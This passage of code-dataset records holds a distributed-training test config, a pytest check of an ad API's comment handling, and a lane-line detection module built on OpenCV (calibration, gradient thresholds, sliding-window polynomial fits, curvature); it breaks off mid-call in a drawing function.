"line_number": 912, "usage_type": "call"}, {"api_name": "pytorch_lightning.callbacks.EarlyStopping", "line_number": 921, "usage_type": "call"}, {"api_name": "torch.optim.lr_scheduler.OneCycleLR", "line_number": 956, "usage_type": "attribute"}, {"api_name": "torch.optim.lr_scheduler", "line_number": 956, "usage_type": "name"}, {"api_name": "torch.optim.Adam", "line_number": 967, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 967, "usage_type": "attribute"}, {"api_name": "torch.optim", "line_number": 969, "usage_type": "attribute"}, {"api_name": 
"torch.optim.lr_scheduler.ExponentialLR", "line_number": 975, "usage_type": "call"}, {"api_name": "torch.optim.lr_scheduler", "line_number": 975, "usage_type": "name"}, {"api_name": "torch.optim.lr_scheduler.CosineAnnealingLR", "line_number": 978, "usage_type": "call"}, {"api_name": "torch.optim.lr_scheduler", "line_number": 978, "usage_type": "name"}, {"api_name": "torch.optim.lr_scheduler.StepLR", "line_number": 981, "usage_type": "call"}, {"api_name": "torch.optim.lr_scheduler", "line_number": 981, "usage_type": "name"}, {"api_name": "torch.optim.lr_scheduler.ReduceLROnPlateau", "line_number": 984, "usage_type": "call"}, {"api_name": "torch.optim.lr_scheduler", "line_number": 984, "usage_type": "name"}, {"api_name": "torch.optim.lr_scheduler.OneCycleLR", "line_number": 995, "usage_type": "call"}, {"api_name": "torch.optim.lr_scheduler", "line_number": 995, "usage_type": "name"}]} +{"seq_id": "270541196", "text": "#!/usr/bin/env python\n# -*- encoding: utf-8 -*-\nimport os\nfrom pathlib import Path\n\nBATCH_SIZE = 128\nIMG_SIZE = 224\nNUM_CLS = 1000\n\n# resnet 18\nmodel = dict(\n type='VanillaResNet',\n block_type='ResNetBottleneck',\n layers=[3, 4, 6, 3],\n num_cls=NUM_CLS\n)\n\ntrain_data = dict(\n dataset=dict(\n type='CIFAR10Dataset',\n root=Path(os.environ['DATA']),\n transform_pipeline=[\n dict(type='RandomResizedCrop', size=IMG_SIZE),\n dict(type='RandomHorizontalFlip'),\n dict(type='ToTensor'),\n dict(type='Normalize', mean=(0.5, 0.5, 0.5), std=(0.5, 0.5, 0.5))\n ]\n ),\n dataloader=dict(\n batch_size=64,\n pin_memory=True,\n num_workers=4,\n sampler=dict(\n type='DataParallelSampler',\n shuffle=True,\n )\n )\n)\n\ntest_data = dict(\n dataset=dict(\n type='CIFAR10Dataset',\n root=Path(os.environ['DATA']),\n train=False,\n transform_pipeline=[\n dict(type='Resize', size=(IMG_SIZE, IMG_SIZE)),\n dict(type='ToTensor'),\n dict(type='Normalize', mean=(0.5, 0.5, 0.5), std=(0.5, 0.5, 0.5))\n ]\n ),\n dataloader=dict(\n batch_size=BATCH_SIZE,\n pin_memory=True,\n num_workers=4,\n )\n)\n\ndist_initializer = [\n dict(type='DataParallelInitializer'),\n]\n\nparallelization = dict(\n pipeline=1,\n tensor=1,\n sequence=-1\n)\n\noptimizer = dict(\n type='Adam',\n lr=0.01\n)\n\nloss = dict(\n type='CrossEntropyLoss'\n)\n\ntrainer = dict(\n max_epochs=5,\n max_iters=1000\n)\n\namp = dict(\n fp16=None,\n)\n\nlevel = 2\n\nparallel = dict(\n pipeline=dict(size=1),\n tensor=dict(size=1, mode=None)\n)\n", "sub_path": "tests/test_zero_data_parallel/config.py", "file_name": "config.py", "file_ext": "py", "file_size_in_byte": 1704, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "pathlib.Path", "line_number": 21, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 21, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 43, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 43, "usage_type": "attribute"}]} +{"seq_id": "113244271", "text": "__author__ = 'jkf'\n\nimport json\n\nfrom adengine.model import User, Ad, Comment\n\n\ndef build_api_url(id_=None):\n if id_ is not None:\n return \"/api/ads/{}\".format(id_)\n return \"/api/ads\"\n\n\ndef _add_resource(session, resource):\n session.add(resource)\n session.commit()\n return resource\n\n\ndef _new_ad(user, text=\"ad-text\"):\n ad = Ad(text=text, author_id=user.id)\n return ad\n\n\ndef _new_user(name='Peter'):\n user = User(email='{name}@example.com'.format(name=name),\n name=name,\n username=name,\n password_hash='12346')\n return 
user\n\n\ndef _new_comment(ad, user, text='bla-bla-bla'):\n    comment = Comment(text=text,\n                      ad_id=ad.id,\n                      author_id=user.id)\n    return comment\n\n\ndef test_comments_refers_both_ad_and_user(session, client):\n    \"Ensure comments added are referenced from the Ad\"\n    # given\n    user = _add_resource(session, _new_user(name='PeterGeneralUser'))\n    user1 = _add_resource(session, _new_user(name='PeterGeneralUserGrant'))\n    ad = _add_resource(session, _new_ad(user, text=\"ad1-text1\"))\n    _add_resource(session, _new_comment(ad, user, text=\"ad11-text1\"))\n    _add_resource(session, _new_comment(ad, user1, text=\"ad12-text1\"))\n\n    # exercise\n    result = client.get(build_api_url()).data\n    doc = json.loads(result)\n\n    # verify\n    ads_dicts = doc.get(\"objects\")\n    assert 1 == len(ads_dicts), \"Expected only one advertisement.\"\n    assert \"ad1-text1\" == ads_dicts[0].get('text')\n", "sub_path": "tests/views/test_ads.py", "file_name": "test_ads.py", "file_ext": "py", "file_size_in_byte": 1519, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "adengine.model.Ad", "line_number": 21, "usage_type": "call"}, {"api_name": "adengine.model.User", "line_number": 26, "usage_type": "call"}, {"api_name": "adengine.model.Comment", "line_number": 34, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 51, "usage_type": "call"}]}
+{"seq_id": "45264770", "text": "import pickle\nimport cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\nimport glob\n\ndef camera_calibrate(cal_images, nx=9, ny=6):\n    '''\n    camera_calibrate finds camera calibration parameters\n    :param cal_images:\n    :param nx: number of squares in width of checkerboard\n    :param ny: number of squares in height of checkerboard\n    :return:\n    '''\n    # prepare object points, like (0,0,0), (1,0,0), (2,0,0) ....,(6,5,0)\n    objp = np.zeros((nx*ny,3), np.float32)\n    objp[:,:2] = np.mgrid[0:nx,0:ny].T.reshape(-1, 2)\n\n    # Arrays to store object points and image points from all the images.\n    objpoints = [] # 3d points in real world space\n    imgpoints = [] # 2d points in image plane.\n\n    # Step through the list and search for chessboard corners\n    for idx, fname in enumerate(cal_images):\n        img = cv2.imread(fname)\n        gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n        # Find the chessboard corners\n        ret, corners = cv2.findChessboardCorners(gray, (nx,ny), None)\n\n        # If found, add object points, image points\n        if ret == True:\n            objpoints.append(objp)\n            imgpoints.append(corners)\n\n    ret, mtx, dist, rvecs, tvecs = cv2.calibrateCamera(objpoints, imgpoints, gray.shape[::-1], None, None)\n\n    return mtx, dist\n\ndef camera_setup(calibration_path='camera_cal/calibration*.jpg', nx=9, ny=6):\n    '''\n    camera_setup sets up calibration images and returns camera calibration results\n    :param calibration_path:\n    :param nx: number of squares in width of checkerboard\n    :param ny: number of squares in height of checkerboard\n    :return:\n    '''\n    # Make a list of calibration images\n    cal_images = glob.glob(calibration_path)\n    cam_mtx, cam_dist = camera_calibrate(cal_images, nx, ny)\n    return cam_mtx, cam_dist\n\ndef cal_undistort(img, mtx, dist):\n    '''\n    cal_undistort undistorts images\n    :param img:\n    :param mtx:\n    :param dist:\n    :return:\n    '''\n    # Use cv2.calibrateCamera() and cv2.undistort()\n    #gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n    #ret, corners = cv2.findChessboardCorners(gray, (8,6), None)\n    undist = cv2.undistort(img, mtx, dist, None, mtx)\n    #undist = np.copy(img) 
# Delete this line\n return undist\n\n# Define a function that takes an image, number of x and y points,\n# camera matrix and distortion coefficients\ndef corners_unwarp(img, nx, ny, mtx, dist):\n # Use the OpenCV undistort() function to remove distortion\n undist = cv2.undistort(img, mtx, dist, None, mtx)\n # Convert undistorted image to grayscale\n gray = cv2.cvtColor(undist, cv2.COLOR_BGR2GRAY)\n # Search for corners in the grayscaled image\n ret, corners = cv2.findChessboardCorners(gray, (nx, ny), None)\n\n if ret == True:\n # If we found corners, draw them! (just for fun)\n cv2.drawChessboardCorners(undist, (nx, ny), corners, ret)\n # Choose offset from image corners to plot detected corners\n # This should be chosen to present the result at the proper aspect ratio\n # My choice of 100 pixels is not exact, but close enough for our purpose here\n offset = 100 # offset for dst points\n # Grab the image shape\n img_size = (gray.shape[1], gray.shape[0])\n\n # For source points I'm grabbing the outer four detected corners\n src = np.float32([corners[0], corners[nx-1], corners[-1], corners[-nx]])\n # For destination points, I'm arbitrarily choosing some points to be\n # a nice fit for displaying our warped result\n # again, not exact, but close enough for our purposes\n dst = np.float32([[offset, offset], [img_size[0]-offset, offset],\n [img_size[0]-offset, img_size[1]-offset],\n [offset, img_size[1]-offset]])\n # Given src and dst points, calculate the perspective transform matrix\n M = cv2.getPerspectiveTransform(src, dst)\n # Warp the image using OpenCV warpPerspective()\n warped = cv2.warpPerspective(undist, M, img_size)\n\n # Return the resulting image and matrix\n return warped, M\n\n# Define a function that takes an image, gradient orientation,\n# and threshold min / max values.\ndef abs_sobel_thresh(img, orient='x', thresh_min=0, thresh_max=255, sobel_kernel = 3):\n # Convert to grayscale\n gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n # Apply x or y gradient with the OpenCV Sobel() function\n # and take the absolute value\n if orient == 'x':\n abs_sobel = np.absolute(cv2.Sobel(gray, cv2.CV_64F, 1, 0, ksize=sobel_kernel))\n if orient == 'y':\n abs_sobel = np.absolute(cv2.Sobel(gray, cv2.CV_64F, 0, 1, ksize=sobel_kernel))\n # Rescale back to 8 bit integer\n scaled_sobel = np.uint8(255*abs_sobel/np.max(abs_sobel))\n # Create a copy and apply the threshold\n binary_output = np.zeros_like(scaled_sobel)\n # Here I'm using inclusive (>=, <=) thresholds, but exclusive is ok too\n binary_output[(scaled_sobel >= thresh_min) & (scaled_sobel <= thresh_max)] = 1\n\n # Return the result\n return binary_output\n\n# Define a function to return the magnitude of the gradient\n# for a given sobel kernel size and threshold values\ndef mag_thresh(img, sobel_kernel=3, mag_thresh=(0, 255)):\n # Convert to grayscale\n gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n # Take both Sobel x and y gradients\n sobelx = cv2.Sobel(gray, cv2.CV_64F, 1, 0, ksize=sobel_kernel)\n sobely = cv2.Sobel(gray, cv2.CV_64F, 0, 1, ksize=sobel_kernel)\n # Calculate the gradient magnitude\n gradmag = np.sqrt(sobelx**2 + sobely**2)\n # Rescale to 8 bit\n scale_factor = np.max(gradmag)/255\n gradmag = (gradmag/scale_factor).astype(np.uint8)\n # Create a binary image of ones where threshold is met, zeros otherwise\n binary_output = np.zeros_like(gradmag)\n binary_output[(gradmag >= mag_thresh[0]) & (gradmag <= mag_thresh[1])] = 1\n\n # Return the binary image\n return binary_output\n\n# Define a function to threshold an image for a 
given range and Sobel kernel\ndef dir_threshold(img, sobel_kernel=3, thresh=(0, np.pi/2)):\n # Grayscale\n gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n # Calculate the x and y gradients\n sobelx = cv2.Sobel(gray, cv2.CV_64F, 1, 0, ksize=sobel_kernel)\n sobely = cv2.Sobel(gray, cv2.CV_64F, 0, 1, ksize=sobel_kernel)\n # Take the absolute value of the gradient direction,\n # apply a threshold, and create a binary image result\n absgraddir = np.arctan2(np.absolute(sobely), np.absolute(sobelx))\n binary_output = np.zeros_like(absgraddir)\n binary_output[(absgraddir >= thresh[0]) & (absgraddir <= thresh[1])] = 1\n\n # Return the binary image\n return binary_output\n\ndef color_threshold(img, channel=2, s_thresh=(170, 255)):\n # Convert to HSV color space and separate the V channel\n hsv = cv2.cvtColor(img, cv2.COLOR_RGB2HLS).astype(np.float)\n s_channel = hsv[:, :, channel]\n\n # Threshold color channel\n s_binary = np.zeros_like(s_channel)\n s_binary[(s_channel >= s_thresh[0]) & (s_channel <= s_thresh[1])] = 1\n\n return s_binary\n\ndef pipeline(img, s_thresh=(170, 255), sx_thresh=(20, 100)):\n img = np.copy(img)\n\n # gradient\n ksize = 3 # Choose a larger odd number to smooth gradient measurements\n gradx = abs_sobel_thresh(img, orient='x', thresh_min=sx_thresh[0], thresh_max=sx_thresh[1], sobel_kernel=ksize)\n grady = abs_sobel_thresh(img, orient='y', thresh_min=sx_thresh[0], thresh_max=sx_thresh[1], sobel_kernel=ksize)\n\n # color\n s_binary = color_threshold(img, 2, s_thresh)\n color_binary = np.dstack((np.zeros_like(gradx), gradx, s_binary))\n\n # mag and dir\n mag_binary = mag_thresh(img, sobel_kernel=ksize, mag_thresh=(0, 255))\n dir_binary = dir_threshold(img, sobel_kernel=ksize, thresh=(0, np.pi / 2))\n\n combined_binary = np.zeros_like(dir_binary)\n combined_binary[(s_binary == 1)|((gradx == 1) & (grady == 1))]=255# | ((mag_binary == 1) & (dir_binary == 1))] = 1\n\n return color_binary, combined_binary\n\ndef window_mask(width, height, img_ref, center, level):\n output = np.zeros_like(img_ref)\n output[int(img_ref.shape[0] - (level + 1) * height):int(img_ref.shape[0] - level * height),\n max(0, int(center - width / 2)):min(int(center + width / 2), img_ref.shape[1])] = 1\n return output\n\ndef find_window_centroids(warped, window_width, window_height, margin):\n window_centroids = [] # Store the (left,right) window centroid positions per level\n window = np.ones(window_width) # Create our window template that we will use for convolutions\n\n # First find the two starting positions for the left and right lane by using np.sum to get the vertical image slice\n # and then np.convolve the vertical image slice with the window template\n\n # Sum quarter bottom of image to get slice, could use a different ratio\n l_sum = np.sum(warped[int(3 * warped.shape[0] / 4):, :int(warped.shape[1] / 2)], axis=0)\n l_center = np.argmax(np.convolve(window, l_sum)) - window_width / 2\n r_sum = np.sum(warped[int(3 * warped.shape[0] / 4):, int(warped.shape[1] / 2):], axis=0)\n r_center = np.argmax(np.convolve(window, r_sum)) - window_width / 2 + int(warped.shape[1] / 2)\n\n # Add what we found for the first layer\n window_centroids.append((l_center, r_center))\n\ndef get_perspective_transform(image, src_in = None, dst_in = None):\n img_size = image.shape\n a = 60\n b = 10\n d = 100\n if src_in is None:\n src_out = np.array([[(img_size[1]/2) - a, (img_size[0]/2) + d],\n [(img_size[1]/6) - b, img_size[0]],\n [(img_size[1]*5/6)+a-b, img_size[0]],\n [(img_size[1]/2)+a+0.5*b, (img_size[0]/2) + d]], np.float32)\n 
def get_perspective_transform(image, src_in=None, dst_in=None):\n    img_size = image.shape\n    a = 60\n    b = 10\n    d = 100\n    if src_in is None:\n        src_out = np.array([[(img_size[1]/2) - a, (img_size[0]/2) + d],\n                            [(img_size[1]/6) - b, img_size[0]],\n                            [(img_size[1]*5/6)+a-b, img_size[0]],\n                            [(img_size[1]/2)+a+0.5*b, (img_size[0]/2) + d]], np.float32)\n    else:\n        src_out = src_in\n\n    if dst_in is None:\n        dst_out = np.array([[(img_size[1]/4), 0],\n                            [(img_size[1]/4), img_size[0]],\n                            [(img_size[1]*3/4), img_size[0]],\n                            [(img_size[1]*3/4), 0]], np.float32)\n    else:\n        dst_out = dst_in\n\n    warp_m = cv2.getPerspectiveTransform(src_out, dst_out)\n    warp_minv = cv2.getPerspectiveTransform(dst_out, src_out)\n\n    return src_out, dst_out, warp_m, warp_minv\n\n
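# Note (sketch): typical application of the transform above, assuming combined_binary\n# comes from pipeline(); warp_minv is kept so the detected lane can later be unwarped\n# back onto the road image (see draw() below):\n#\n#     src, dst, warp_m, warp_minv = get_perspective_transform(combined_binary)\n#     warped = cv2.warpPerspective(combined_binary, warp_m,\n#                                  (combined_binary.shape[1], combined_binary.shape[0]))\n\n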
def generate_plot(binary_warped, left_fit, right_fit, line=None):\n    # Generate x and y values for plotting\n    ploty = np.linspace(0, binary_warped.shape[0] - 1, binary_warped.shape[0])\n    left_fitx = left_fit[0] * ploty ** 2 + left_fit[1] * ploty + left_fit[2]\n    right_fitx = right_fit[0] * ploty ** 2 + right_fit[1] * ploty + right_fit[2]\n\n    return left_fitx, right_fitx, ploty\n\n\ndef get_lane_lines(binary_warped):\n    # Assuming you have created a warped binary image called \"binary_warped\"\n    # Take a histogram of the bottom half of the image\n    histogram = np.sum(binary_warped[int(binary_warped.shape[0] / 2):, :], axis=0)\n    # Create an output image to draw on and visualize the result\n    out_img = np.dstack((binary_warped, binary_warped, binary_warped)) * 255\n    # Find the peak of the left and right halves of the histogram\n    # These will be the starting point for the left and right lines\n    midpoint = int(histogram.shape[0] / 2)\n    leftx_base = np.argmax(histogram[:midpoint])\n    rightx_base = np.argmax(histogram[midpoint:]) + midpoint\n\n    # Choose the number of sliding windows\n    nwindows = 9\n    # Set height of windows\n    window_height = int(binary_warped.shape[0] / nwindows)\n    # Identify the x and y positions of all nonzero pixels in the image\n    nonzero = binary_warped.nonzero()\n    nonzeroy = np.array(nonzero[0])\n    nonzerox = np.array(nonzero[1])\n    # Current positions to be updated for each window\n    leftx_current = leftx_base\n    rightx_current = rightx_base\n    # Set the width of the windows +/- margin\n    margin = 100\n    # Set minimum number of pixels found to recenter window\n    minpix = 50\n    # Create empty lists to receive left and right lane pixel indices\n    left_lane_inds = []\n    right_lane_inds = []\n\n    # Step through the windows one by one\n    for window in range(nwindows):\n        # Identify window boundaries in x and y (and right and left)\n        win_y_low = binary_warped.shape[0] - (window + 1) * window_height\n        win_y_high = binary_warped.shape[0] - window * window_height\n        win_xleft_low = leftx_current - margin\n        win_xleft_high = leftx_current + margin\n        win_xright_low = rightx_current - margin\n        win_xright_high = rightx_current + margin\n        # Draw the windows on the visualization image\n        cv2.rectangle(out_img, (win_xleft_low, win_y_low), (win_xleft_high, win_y_high), (0, 255, 0), 2)\n        cv2.rectangle(out_img, (win_xright_low, win_y_low), (win_xright_high, win_y_high), (0, 255, 0), 2)\n        # Identify the nonzero pixels in x and y within the window\n        good_left_inds = ((nonzeroy >= win_y_low) & (nonzeroy < win_y_high) & (nonzerox >= win_xleft_low) & (\n                nonzerox < win_xleft_high)).nonzero()[0]\n        good_right_inds = ((nonzeroy >= win_y_low) & (nonzeroy < win_y_high) & (nonzerox >= win_xright_low) & (\n                nonzerox < win_xright_high)).nonzero()[0]\n        # Append these indices to the lists\n        left_lane_inds.append(good_left_inds)\n        right_lane_inds.append(good_right_inds)\n        # If you found > minpix pixels, recenter next window on their mean position\n        if len(good_left_inds) > minpix:\n            leftx_current = int(np.mean(nonzerox[good_left_inds]))\n        if len(good_right_inds) > minpix:\n            rightx_current = int(np.mean(nonzerox[good_right_inds]))\n\n    # Concatenate the arrays of indices\n    left_lane_inds = np.concatenate(left_lane_inds)\n    right_lane_inds = np.concatenate(right_lane_inds)\n\n    # Extract left and right line pixel positions\n    leftx = nonzerox[left_lane_inds]\n    lefty = nonzeroy[left_lane_inds]\n    rightx = nonzerox[right_lane_inds]\n    righty = nonzeroy[right_lane_inds]\n\n    # Fit a second order polynomial to each\n    left_fit = np.polyfit(lefty, leftx, 2)\n    right_fit = np.polyfit(righty, rightx, 2)\n\n    # Generate x and y values for plotting\n    left_fitx, right_fitx, ploty = generate_plot(binary_warped, left_fit, right_fit)\n\n    out_img[nonzeroy[left_lane_inds], nonzerox[left_lane_inds]] = [255, 0, 0]\n    out_img[nonzeroy[right_lane_inds], nonzerox[right_lane_inds]] = [0, 0, 255]\n\n    return left_fit, right_fit, left_fitx, right_fitx, ploty, out_img\n\ndef get_lane_lines_with_prior(binary_warped, left_fit, right_fit):\n    # Assume you now have a new warped binary image\n    # from the next frame of video (also called \"binary_warped\")\n    # It's now much easier to find line pixels!\n    nonzero = binary_warped.nonzero()\n    nonzeroy = np.array(nonzero[0])\n    nonzerox = np.array(nonzero[1])\n    margin = 150\n    left_lane_inds = ((nonzerox > (left_fit[0] * (nonzeroy ** 2) + left_fit[1] * nonzeroy + left_fit[2] - margin)) & (\n            nonzerox < (left_fit[0] * (nonzeroy ** 2) + left_fit[1] * nonzeroy + left_fit[2] + margin)))\n    right_lane_inds = (\n            (nonzerox > (right_fit[0] * (nonzeroy ** 2) + right_fit[1] * nonzeroy + right_fit[2] - margin)) & (\n            nonzerox < (right_fit[0] * (nonzeroy ** 2) + right_fit[1] * nonzeroy + right_fit[2] + margin)))\n\n    # Again, extract left and right line pixel positions\n    leftx = nonzerox[left_lane_inds]\n    lefty = nonzeroy[left_lane_inds]\n    rightx = nonzerox[right_lane_inds]\n    righty = nonzeroy[right_lane_inds]\n    # Fit a second order polynomial to each\n    left_fit = np.polyfit(lefty, leftx, 2)\n    right_fit = np.polyfit(righty, rightx, 2)\n    # Generate x and y values for plotting\n    ploty = np.linspace(0, binary_warped.shape[0] - 1, binary_warped.shape[0])\n    left_fitx = left_fit[0] * ploty ** 2 + left_fit[1] * ploty + left_fit[2]\n    right_fitx = right_fit[0] * ploty ** 2 + right_fit[1] * ploty + right_fit[2]\n\n    # Create an image to draw on and an image to show the selection window\n    out_img = np.dstack((binary_warped, binary_warped, binary_warped)) * 255\n    window_img = np.zeros_like(out_img)\n    # Color in left and right line pixels\n    out_img[nonzeroy[left_lane_inds], nonzerox[left_lane_inds]] = [255, 0, 0]\n    out_img[nonzeroy[right_lane_inds], nonzerox[right_lane_inds]] = [0, 0, 255]\n\n    # Generate a polygon to illustrate the search window area\n    # And recast the x and y points into usable format for cv2.fillPoly()\n    left_line_window1 = np.array([np.transpose(np.vstack([left_fitx - margin, ploty]))])\n    left_line_window2 = np.array([np.flipud(np.transpose(np.vstack([left_fitx + margin, ploty])))])\n    left_line_pts = np.hstack((left_line_window1, left_line_window2))\n    right_line_window1 = np.array([np.transpose(np.vstack([right_fitx - margin, ploty]))])\n    right_line_window2 = np.array([np.flipud(np.transpose(np.vstack([right_fitx + margin, ploty])))])\n    right_line_pts = np.hstack((right_line_window1, right_line_window2))\n\n    # Draw the lane onto the warped blank image\n    cv2.fillPoly(window_img, np.int_([left_line_pts]), (0, 255, 0))\n    cv2.fillPoly(window_img, np.int_([right_line_pts]), (0, 255, 0))\n    result = cv2.addWeighted(out_img, 1, window_img, 0.3, 0)\n    plt.imshow(result)\n    plt.plot(left_fitx, ploty, color='yellow')\n    plt.plot(right_fitx, ploty, color='yellow')\n    plt.xlim(0, 1280)\n    plt.ylim(720, 0)\n\n    return left_fit, right_fit, left_fitx, right_fitx, ploty, result\n\n
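# Note (sketch): intended call pattern across video frames; the blind sliding-window\n# search runs on the first frame, then its fits seed the cheaper prior-based search:\n#\n#     left_fit, right_fit, left_fitx, right_fitx, ploty, vis = get_lane_lines(warped)\n#     # next frame: search only within a margin around the previous polynomials\n#     left_fit, right_fit, left_fitx, right_fitx, ploty, vis = get_lane_lines_with_prior(\n#         next_warped, left_fit, right_fit)\n\n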
def window_mask(width, height, img_ref, center, level):\n    output = np.zeros_like(img_ref)\n    output[int(img_ref.shape[0] - (level + 1) * height):int(img_ref.shape[0] - level * height),\n           max(0, int(center - width / 2)):min(int(center + width / 2), img_ref.shape[1])] = 1\n    return output\n\n\ndef find_window_centroids(warped, window_width, window_height, margin):\n    window_centroids = []  # Store the (left,right) window centroid positions per level\n    window = np.ones(window_width)  # Create our window template that we will use for convolutions\n\n    # First find the two starting positions for the left and right lane by using np.sum to get the vertical image slice\n    # and then np.convolve the vertical image slice with the window template\n\n    # Sum quarter bottom of image to get slice, could use a different ratio\n    l_sum = np.sum(warped[int(3 * warped.shape[0] / 4):, :int(warped.shape[1] / 2)], axis=0)\n    l_center = np.argmax(np.convolve(window, l_sum)) - window_width / 2\n    r_sum = np.sum(warped[int(3 * warped.shape[0] / 4):, int(warped.shape[1] / 2):], axis=0)\n    r_center = np.argmax(np.convolve(window, r_sum)) - window_width / 2 + int(warped.shape[1] / 2)\n\n    # Add what we found for the first layer\n    window_centroids.append((l_center, r_center))\n\n    # Go through each layer looking for max pixel locations\n    for level in range(1, int(warped.shape[0] / window_height)):\n        # convolve the window into the vertical slice of the image\n        image_layer = np.sum(\n            warped[int(warped.shape[0] - (level + 1) * window_height):int(warped.shape[0] - level * window_height), :],\n            axis=0)\n        conv_signal = np.convolve(window, image_layer)\n        # Find the best left centroid by using past left center as a reference\n        # Use window_width/2 as offset because convolution signal reference is at right side of window, not center of window\n        offset = window_width / 2\n        l_min_index = int(max(l_center + offset - margin, 0))\n        l_max_index = int(min(l_center + offset + margin, warped.shape[1]))\n        l_center = np.argmax(conv_signal[l_min_index:l_max_index]) + l_min_index - offset\n        # Find the best right centroid by using past right center as a reference\n        r_min_index = int(max(r_center + offset - margin, 0))\n        r_max_index = int(min(r_center + offset + margin, warped.shape[1]))\n        r_center = np.argmax(conv_signal[r_min_index:r_max_index]) + r_min_index - offset\n        # Add what we found for that layer\n        window_centroids.append((l_center, r_center))\n\n    return window_centroids\n\n
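# Note (sketch): find_window_centroids returns one (left_x, right_x) centroid pair per\n# vertical layer, bottom layer first. With the defaults used in\n# sliding_window_convolution below (window_height=80 on a 720-row warped image)\n# that is 9 pairs:\n#\n#     centroids = find_window_centroids(warped, window_width=50, window_height=80, margin=100)\n#     assert len(centroids) == warped.shape[0] // 80\n\n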
def sliding_window_convolution(warped):\n    # window settings\n    window_width = 50\n    window_height = 80  # Break image into 9 vertical layers since image height is 720\n    margin = 100  # How much to slide left and right for searching\n\n    window_centroids = find_window_centroids(warped, window_width, window_height, margin)\n\n    # If we found any window centers\n    if len(window_centroids) > 0:\n\n        # Points used to draw all the left and right windows\n        l_points = np.zeros_like(warped)\n        r_points = np.zeros_like(warped)\n\n        # Go through each level and draw the windows\n        for level in range(0, len(window_centroids)):\n            # Window_mask is a function to draw window areas\n            l_mask = window_mask(window_width, window_height, warped, window_centroids[level][0], level)\n            r_mask = window_mask(window_width, window_height, warped, window_centroids[level][1], level)\n            # Add graphic points from window mask here to total pixels found\n            l_points[(l_points == 255) | (l_mask == 1)] = 255\n            r_points[(r_points == 255) | (r_mask == 1)] = 255\n\n        # Draw the results\n        template = np.array(r_points + l_points, np.uint8)  # add both left and right window pixels together\n        zero_channel = np.zeros_like(template)  # create a zero color channel\n        template = np.array(cv2.merge((zero_channel, template, zero_channel)), np.uint8)  # make window pixels green\n        warpage = np.array(cv2.merge((warped, warped, warped)),\n                           np.uint8)  # making the original road pixels 3 color channels\n        output = cv2.addWeighted(warpage, 1, template, 0.5, 0.0)  # overlay the original road image with window results\n\n    # If no window centers found, just display the original road image\n    else:\n        output = np.array(cv2.merge((warped, warped, warped)), np.uint8)\n\n    return output\n\ndef get_curvature(ploty, left_fit, right_fit, leftx, rightx, xm_per_pix=3.7 / 700, ym_per_pix=30 / 720):\n    # Define y-value where we want radius of curvature\n    # I'll choose the maximum y-value, corresponding to the bottom of the image\n    y_eval = np.max(ploty)\n    # Pixel-space version, kept for reference:\n    # left_curverad = ((1 + (2 * left_fit[0] * y_eval + left_fit[1]) ** 2) ** 1.5) / np.absolute(2 * left_fit[0])\n    # right_curverad = ((1 + (2 * right_fit[0] * y_eval + right_fit[1]) ** 2) ** 1.5) / np.absolute(2 * right_fit[0])\n    # Example values: 1926.74 1908.48\n\n    # Define conversions in x and y from pixel space to meters:\n    # ym_per_pix = 30 / 720 meters per pixel in y dimension,\n    # xm_per_pix = 3.7 / 700 meters per pixel in x dimension (see the defaults above)\n\n    # Fit new polynomials to x,y in world space\n    left_fit_cr = np.polyfit(ploty * ym_per_pix, leftx * xm_per_pix, 2)\n    right_fit_cr = np.polyfit(ploty * ym_per_pix, rightx * xm_per_pix, 2)\n    # Calculate the new radii of curvature\n    left_curverad = ((1 + (2 * left_fit_cr[0] * y_eval * ym_per_pix + left_fit_cr[1]) ** 2) ** 1.5) / np.absolute(\n        2 * left_fit_cr[0])\n    right_curverad = ((1 + (2 * right_fit_cr[0] * y_eval * ym_per_pix + right_fit_cr[1]) ** 2) ** 1.5) / np.absolute(\n        2 * right_fit_cr[0])\n\n    return left_curverad, right_curverad\n\n
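# Note (sketch): the world-space radius follows R = (1 + (2*A*y + B)**2)**1.5 / |2*A|\n# for a fit x = A*y**2 + B*y + C. A hypothetical call, reusing the fits and plot\n# points produced by get_lane_lines:\n#\n#     left_fit, right_fit, left_fitx, right_fitx, ploty, _ = get_lane_lines(warped)\n#     left_rad_m, right_rad_m = get_curvature(ploty, left_fit, right_fit, left_fitx, right_fitx)\n#     # radii are in meters via the xm_per_pix / ym_per_pix defaults above\n\n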
def draw(undist, image, warped, left_fitx, right_fitx, ploty, Minv, left_curverad, right_curverad, line_base_pos, detected,\n         left_curverad_current, right_curverad_current, line_base_pos_current, straightAway=False):\n    # Create an image to draw the lines on\n    warp_zero = np.zeros_like(warped).astype(np.uint8)\n    color_warp = np.dstack((warp_zero, warp_zero, warp_zero))\n\n    # Recast the x and y points into usable format for cv2.fillPoly()\n    pts_left = np.array([np.transpose(np.vstack([left_fitx, ploty]))])\n    pts_right = np.array([np.flipud(np.transpose(np.vstack([right_fitx, ploty])))])\n    pts = np.hstack((pts_left, pts_right))\n\n    # Draw the lane onto the warped blank image\n    cv2.fillPoly(color_warp, np.int_([pts]), (0, 255, 0))\n\n    # Warp the blank back to original image space using inverse perspective matrix (Minv)\n    newwarp = cv2.warpPerspective(color_warp, Minv, (image.shape[1], image.shape[0]))\n    # Combine the result with the original image\n    result = cv2.addWeighted(undist, 1, newwarp, 0.3, 0)\n    plt.imshow(result)\n\n    # write curvature and position findings\n    font = cv2.FONT_HERSHEY_SIMPLEX\n    fontColor = (255, 255, 255)\n    if not detected:\n        fontColor = (255, 0, 0)\n    cv2.putText(result, 'Radius of left line curvature: ' + str(left_curverad) + ' compared to ' + str(left_curverad_current) + ' m', (50, 20), font, 1, fontColor, 2, cv2.LINE_AA)\n    cv2.putText(result, 'Radius of right line curvature: ' + str(right_curverad) + ' compared to ' + str(right_curverad_current) + ' m', (50, 50), font, 